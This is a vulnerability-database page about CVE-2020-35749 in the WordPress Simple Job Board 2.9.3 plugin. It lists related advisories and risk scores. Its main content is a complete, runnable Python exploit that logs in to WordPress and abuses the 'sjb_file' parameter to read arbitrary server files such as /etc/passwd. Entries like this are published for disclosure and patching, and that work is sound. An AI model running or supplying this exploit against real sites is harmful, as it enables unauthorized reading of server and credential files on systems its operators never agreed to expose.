WordPress Simple Job Board 2.9.3 Local File Inclusion

🗓️ 08 Feb 2022 00:00:00Reported by Ven3xyType

packetstorm🔗 packetstormsecurity.com👁 228 Views

Wordpress Simple Job Board 2.9.3 Local File Inclusion CVE-2020-3574

Reporter	Title	Published	Views	Family All 17
0day.today	Wordpress Simple Job Board 2.9.3 Plugin - Local File Inclusion Exploit	8 Feb 202200:00	–	zdt
Circl	CVE-2020-35749	21 Jan 202100:00	–	circl
CNNVD	Wordpress Simple Board Job Plugin 路径遍历漏洞	15 Jan 202100:00	–	cnnvd
CNVD	WordPress Simple Board Job plugin path traversal vulnerability	18 Jan 202100:00	–	cnvd
CVE	CVE-2020-35749	15 Jan 202116:51	–	cve
Cvelist	CVE-2020-35749	15 Jan 202116:51	–	cvelist
Exploit DB	Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)	21 Jan 202100:00	–	exploitdb
Exploit DB	Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion	8 Feb 202200:00	–	exploitdb
Nuclei	WordPress Simple Job Board <2.9.4 - Local File Inclusion	7 Jun 202603:02	–	nuclei
NVD	CVE-2020-35749	15 Jan 202117:15	–	nvd

`# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion  
# Date: 2022-02-06  
# Exploit Author: Ven3xy  
# Vendor Homepage: https://wordpress.org/plugins/simple-job-board/  
# Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip  
# Version: 2.9.3  
# Tested on: Ubuntu 20.04 LTS  
# CVE : CVE-2020-35749  
  
  
import requests  
import sys  
import time  
  
class color:  
HEADER = '\033[95m'  
IMPORTANT = '\33[35m'  
NOTICE = '\033[33m'  
OKBLUE = '\033[94m'  
OKGREEN = '\033[92m'  
WARNING = '\033[93m'  
RED = '\033[91m'  
END = '\033[0m'  
UNDERLINE = '\033[4m'  
LOGGING = '\33[34m'  
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]   
  
  
def banner():  
run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8   
Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__   
Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888   
Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888   
Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888   
Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/   
888 888 \n'''  
run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n'''   
run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''  
print(run+run2+run3)   
  
  
  
if (len(sys.argv) != 5):  
banner()  
print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")  
print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")  
exit()  
  
else:  
banner()  
fetch_path = sys.argv[2]  
print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path)  
time.sleep(3)  
target_url = sys.argv[1]  
usernamex = sys.argv[3]  
passwordx = sys.argv[4]  
print("\n")  
login = target_url+"wp-login.php"  
wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path  
username = usernamex  
password = passwordx  
  
with requests.Session() as s:  
headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check',  
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' }  
  
post_data={ 'log':username, 'pwd':password,   
'wp-submit':'Log In','redirect_to':wp_path,   
'testcookie':'1'  
}   
  
s.post(login, headers=headers, data=post_data)  
resp = s.get(wp_path)  
  
out_file = open("output.txt", "w")  
print(resp.text, file=out_file)  
out_file.close()  
print(color_random[4]+resp.text)  
out = color_random[5]+"\n[+] Output Saved as: output.txt\n"  
print(out)  
  
`

08 Feb 2022 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 24

CVSS 3.17.7

EPSS0.77927